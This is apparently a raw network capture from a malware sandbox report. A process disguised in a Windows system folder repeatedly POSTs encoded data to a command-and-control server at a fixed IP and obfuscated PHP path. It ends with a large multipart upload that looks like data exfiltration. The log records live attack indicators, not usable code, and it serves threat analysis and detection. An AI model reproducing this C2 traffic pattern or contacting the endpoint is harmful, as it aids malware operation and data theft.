Jan 10, 2025 07:57:44.793194056 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:44.945664883 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:57:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49752 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:45.160131931 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49753 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:45.325611115 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2032
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:57:45.673350096 CET | 2032 | OUT | Data Raw: 59 56 43 56 5e 5f 56 57 58 5b 57 56 50 5c 5b 54 55 5c 5e 5d 54 50 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: YVCV^_VWX[WVP\[TU\^]TPQ\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'A;13[?[:(54]/92>>4X?"'(?3)?& _$:'_!/Y.
Jan 10, 2025 07:57:46.060854912 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:46.213042021 CET | 349 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:57:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 39 38 0d 0a 0f 1e 39 54 20 3b 37 0d 26 2f 00 0d 39 01 32 0e 28 20 3c 10 3d 03 37 13 29 0d 24 0c 2e 2f 3b 55 35 3b 29 5e 28 0c 2d 08 30 3f 3c 53 26 37 21 59 0c 13 25 03 3c 14 0c 08 3d 39 24 59 3c 21 00 45 27 20 37 10 27 03 00 0a 21 3c 3c 5e 3e 39 2e 0d 3f 08 32 0d 2d 39 30 5b 2a 3c 33 0f 27 26 2a 57 0c 1f 25 0b 22 54 39 50 36 0b 3a 10 33 16 09 10 27 2b 34 1c 31 01 34 05 20 3a 09 10 3a 39 24 5d 36 3e 3b 02 3e 3d 39 0a 23 31 23 09 29 2c 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 989T ;7&/92( <=7)$./;U5;)^(-0?<S&7!Y%<=9$Y<!E' 7'!<<^>9.?2-90[*<3'&*W%"T9P6:3'+414 ::9$]6>;>=9#1#), Q""P0]Q0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49754 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:45.486416101 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:57:45.855304956 CET | 2544 | OUT | Data Raw: 59 55 46 55 5e 56 56 51 58 5b 57 56 50 53 5b 56 55 51 5e 52 54 5a 51 53 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: YUFU^VVQX[WVPS[VUQ^RTZQSRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$8<-9^<68Z;><=)8X"4V(#3_>?% ':'_!/Y.
Jan 10, 2025 07:57:46.222455978 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:46.356924057 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:57:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 49755 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:47.815390110 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Jan 10, 2025 07:57:48.173391104 CET | 2544 | OUT | Data Raw: 59 50 46 57 5e 5f 53 53 58 5b 57 56 50 53 5b 50 55 57 5e 5e 54 5d 51 5b 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: YPFW^_SSX[WVPS[PUW^^T]Q[RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'A.!$<-\( X-:)<-$(;8]"$ ?0*>A1='$'_!/Y.
Jan 10, 2025 07:57:48.556001902 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:48.685468912 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:57:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID: 15 | Source IP: 192.168.2.4 | Source Port: 49756 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:48.820349932 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:57:49.173388004 CET | 2544 | OUT | Data Raw: 5c 55 46 50 5e 56 53 50 58 5b 57 56 50 5e 5b 53 55 57 5e 52 54 5e 51 5b 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: \UFP^VSPX[WVP^[SUW^RT^Q[RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'E,$<1<P;;\1T?+<;464,??^)Y6F$.#3'_!/Y.=
Jan 10, 2025 07:57:49.563672066 CET | 225 | IN | HTTP/1.1 100 Continue
Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 37 3a 34 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:57:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=V@[0


Session ID: 16 | Source IP: 192.168.2.4 | Source Port: 49757 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:49.717104912 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:57:50.067127943 CET | 2544 | OUT | Data Raw: 59 50 43 50 5e 59 56 50 58 5b 57 56 50 5f 5b 53 55 51 5e 5c 54 5f 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: YPCP^YVPX[WVP_[SUQ^\T_QYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/!/+=.?57-9-?(('"7W<0/^+?"@%=$^3*'_!/Y.9
Jan 10, 2025 07:57:50.463190079 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:50.590858936 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:57:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID: 17 | Source IP: 192.168.2.4 | Source Port: 49758 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:50.724101067 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:57:51.079622030 CET | 2544 | OUT | Data Raw: 5c 55 43 5e 5e 5e 56 56 58 5b 57 56 50 58 5b 52 55 51 5e 5f 54 58 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: \UC^^^VVX[WVPX[RUQ^_TXQ^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;$>.:?Y;:><.8+85(##Z*>@$-3'_!/Y.%


Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 49759 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:51.226663113 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2032
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:57:51.579586983 CET | 2032 | OUT | Data Raw: 59 56 43 5f 5e 5c 53 57 58 5b 57 56 50 5c 5b 54 55 52 5e 5d 54 5e 51 53 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: YVC_^\SWX[WVP\[TUR^]T^QSRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$83\+="<[,\.<(\(8;6' *#)2>;0'_!/Y.
Jan 10, 2025 07:57:51.993340015 CET | 374 | IN | HTTP/1.1 100 Continue
Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 37 3a 35 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 39 38 0d 0a 0f 1e 3a 0e 20 3b 06 1e 25 06 3e 0a 39 01 32 0b 2b 1e 3c 59 2a 3e 30 03 29 1d 2c 0f 2e 01 37 55 20 28 3a 07 3c 22 3e 50 27 5a 34 55 25 1d 21 59 0c 13 26 10 2b 14 03 1e 3d 2a 02 1c 2b 31 3d 1b 30 55 20 07 27 13 03 18 23 01 30 5e 3c 39 2e 0c 3c 0f 25 1f 39 3a 38 5a 3e 3c 3f 0c 27 26 2a 57 0c 1f 26 53 21 31 36 09 36 1c 26 12 33 16 27 53 33 3b 2c 50 32 06 34 04 34 3a 27 1d 3a 00 3c 1f 22 10 2c 12 2a 2e 3d 0c 35 32 20 50 2b 06 20 51 22 0d 22 50 [TRUNCATED]
Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:57:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding98: ;%>92+<Y*>0),.7U (:<">P'Z4U%!Y&+=*+1=0U '#0^<9.<%9:8Z><?'&*W&S!166&3'S3;,P244:':<",*.=52 P+ Q""P0]Q0


Session ID: 19 | Source IP: 192.168.2.4 | Source Port: 49760 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:51.383697987 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:57:51.736162901 CET | 2544 | OUT | Data Raw: 59 5e 43 57 5e 5f 56 50 58 5b 57 56 50 53 5b 56 55 5d 5e 5e 54 5d 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: Y^CW^_VPX[WVPS[VU]^^T]Q\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR',;]>.&+?/U?\)(Y!$,*3?Y*,=%=,&:'_!/Y.
Jan 10, 2025 07:57:52.125248909 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:52.278945923 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:57:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 49761 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:52.411108971 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2536
Expect: 100-continue
Jan 10, 2025 07:57:52.767134905 CET | 2536 | OUT | Data Raw: 5c 54 46 57 5b 5b 56 56 58 5b 57 56 50 5b 5b 52 55 5c 5e 5d 54 5a 51 5b 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: \TFW[[VVX[WVP[[RU\^]TZQ[RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'B8/?-[(6;/9(=$\+86,(3/=:B&#3'_!/Y.-
Jan 10, 2025 07:57:53.150372982 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:53.277571917 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:57:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 49762 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:53.472232103 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2536
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:57:53.829628944 CET | 2536 | OUT | Data Raw: 5c 53 43 56 5b 5d 56 50 58 5b 57 56 50 5b 5b 5a 55 56 5e 5b 54 5d 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: \SCV[]VPX[WVP[[ZUV^[T]QZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'C/1?(=<<Z;!+=(0Y"7'</Z=:243'_!/Y.
Jan 10, 2025 07:57:54.220063925 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:54.350802898 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:57:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID: 22 | Source IP: 192.168.2.4 | Source Port: 49763 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860 | Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:54.522531033 CET | 577 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----s4VOHFAR20G8vVPIwClEHtRE0DwTdOyX8p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 204914
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:57:54.876604080 CET | 12360 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 73 34 56 4f 48 46 41 52 32 30 47 38 76 56 50 49 77 43 6c 45 48 74 52 45 30 44 77 54 64 4f 79 58 38 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
Data Ascii: ------s4VOHFAR20G8vVPIwClEHtRE0DwTdOyX8pContent-Disposition: form-data; name="0"Content-Type: text/plainYSFT[\SPX[WVP_[RUW^^TPQZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^
                                                                                                Jan 10, 2025 07:57:54.882085085 CET2472OUTData Raw: 58 76 51 71 6d 44 33 39 30 6c 6a 48 71 2b 4b 2b 61 6f 69 38 6f 77 4a 2b 4a 74 74 6a 6f 48 47 6c 6b 35 4d 2f 76 46 50 72 35 65 67 37 59 78 4a 39 44 77 34 4f 44 70 6a 7a 55 69 4e 61 79 7a 54 55 56 6a 47 44 2b 32 76 72 6c 44 53 38 63 57 74 4a 41 64
